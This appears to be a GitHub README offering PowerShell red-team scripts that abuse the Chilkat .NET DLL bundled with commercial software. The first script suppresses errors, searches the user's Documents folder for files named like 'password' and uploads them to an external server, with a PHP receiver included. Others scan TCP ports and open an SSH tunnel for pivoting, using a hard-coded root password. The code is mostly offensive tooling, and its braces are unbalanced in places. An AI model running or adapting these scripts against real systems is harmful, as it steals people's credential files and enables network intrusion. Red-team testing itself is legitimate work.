billchaison / Katapult

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool


Example of exploiting the Chilkat .NET assembly for Red Team exercises using Powershell. This assembly is loaded with functionality and is bundled with many commercial software products.

This example searches the user's MyDocuments folder and uploads file names matching password to an external web server.

$ErrorActionPreference = 'silentlycontinue'
$ckdll = Resolve-Path -Path "C:\Program Files\*\ChilkatDotNet*dll"
if($ckdll.Path -eq $null) {
   $ckdll = Resolve-Path -Path "C:\Program Files\*\*\ChilkatDotNet*dll"
   if($ckdll.Path -ne $null) {
      $ckpath = $ckdll.Path
} else {
   $ckpath = $ckdll.Path
if($ckpath -eq $null) {
   Write-Host "Chilkat DLL not found"
} else {
   $null = [System.Reflection.Assembly]::LoadFrom($ckpath)
   $up = New-Object Chilkat.Upload
   $docs = [environment]::getfolderpath("mydocuments")
   $up.Hostname = ""
   $up.Port = 80
   $up.Path = "/upload.php"
   $up.Expect100Continue = $false
   $f = Get-ChildItem -Path $docs -Recurse -Filter "*password*" | Select-Object -Expand FullName
   if($f -ne $null) {
      $i = 1
      $f | ForEach-Object { $up.AddFileReference("file" + $i, $_); $i++ }
      $r = $up.BlockingUpload()
      if($r -eq $true) {
         Write-Host "$($f.Count) files uploaded"
      } else {
         if($up.ResponseStatus -ge 200 -and $up.ResponseStatus -le 299) {
            Write-Host "$($f.Count) files uploaded"
         } else {
            Write-Host "File upload failed"
            Write-Host $up.LastErrorText
   } else {
      Write-Host "No matching files found"

The upload.php script to receive the files could look like this.

   $fpath = "/apachetmp/";
   foreach(array_keys($_FILES) as $f)
      if($_FILES[$f]['error'] == 0)
         move_uploaded_file($_FILES[$f]['tmp_name'], $fpath . $_FILES[$f]['name']);

This example performs a TCP port scan.

$ErrorActionPreference = 'silentlycontinue'
$ckdll = Resolve-Path -Path "C:\Program Files\*\ChilkatDotNet*dll"
if($ckdll.Path -eq $null) {
   $ckdll = Resolve-Path -Path "C:\Program Files\*\*\ChilkatDotNet*dll"
   if($ckdll.Path -ne $null) {
      $ckpath = $ckdll.Path
} else {
   $ckpath = $ckdll.Path
if($ckpath -eq $null) {
   Write-Host "Chilkat DLL not found"
} else {
   $null = [System.Reflection.Assembly]::LoadFrom($ckpath)
   $sock = New-Object Chilkat.Socket
   $null = $sock.UnlockComponent("whatever")
   $targets = "", ""
   $ports = 21, 22, 23, 80, 443, 445, 389, 3389
   $mswait = 250
   foreach($t in $targets) {
      foreach ($p in $ports) {
         $c = $sock.Connect($t, $p, $false, $mswait)
         if($c -eq $true) {
            Write-Host "SUCCESS: $t port $p"
            $null = $sock.Close($mswait)
         } else {
            Write-Host "FAIL: $t port $p"

This example creates an SSH TCP tunnel for pivoting.

$ErrorActionPreference = 'silentlycontinue'
$ckdll = Resolve-Path -Path "C:\Program Files\*\ChilkatDotNet*dll"
if($ckdll.Path -eq $null) {
   $ckdll = Resolve-Path -Path "C:\Program Files\*\*\ChilkatDotNet*dll"
   if($ckdll.Path -ne $null) {
      $ckpath = $ckdll.Path
} else {
   $ckpath = $ckdll.Path
if($ckpath -eq $null) {
   Write-Host "Chilkat DLL not found"
} else {
   $null = [System.Reflection.Assembly]::LoadFrom($ckpath)
   $sshtun = New-Object Chilkat.SshTunnel
   $null = $sshtun.UnlockComponent("whatever")
   $sshhost = "" # The host to SSH to
   $sshport = 22 # The port to SSH to
   $sshuser = "root" # The user name to login with 
   $sshpass = "P@55w0rd4r**t" # The password to login with
   $tunhost = "" # The host you will access through the tunnel
   $tunport = 80 # The port you will access through the tunnel
   $locaddr = "" # The IP address on this Windows host you will connect to
   $locport = 8080 # The port on this Windows host you will connect to
   $sshtun.ListenBindIpAddress = $locaddr
   $sshtun.DestHostname = $tunhost
   $sshtun.DestPort = $tunport
   $null = $sshtun.Connect($sshhost, $sshport)
   $null = $sshtun.AuthenticatePw($sshuser, $sshpass)
   if($sshtun.IsSshConnected() -eq $false) {
      Write-Host "SSH logon failed"
   } else {
      $null = $sshtun.BeginAccepting($locport)
      Write-Host "Connect to $locaddr port $locport to access tunneled service $tunhost port $tunport"
      Write-Host "Press any key to close the tunnel and exit"
      $null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
      $null = $sshtun.CloseTunnel($true)

To list other functions you may wish to use (open the DLL with dnSpy or ILSpy to inspect).

$ErrorActionPreference = 'silentlycontinue'
$ckdll = Resolve-Path -Path "C:\Program Files\*\ChilkatDotNet*dll"
if($ckdll.Path -eq $null) {
   $ckdll = Resolve-Path -Path "C:\Program Files\*\*\ChilkatDotNet*dll"
   if($ckdll.Path -ne $null) {
      $ckpath = $ckdll.Path
} else {
   $ckpath = $ckdll.Path
if($ckpath -eq $null) {
   Write-Host "Chilkat DLL not found"
} else {
   $asm = [System.Reflection.Assembly]::LoadFrom($ckpath)
   $asm.GetTypes() | ?{$_.IsPublic} | select Name | sort Name
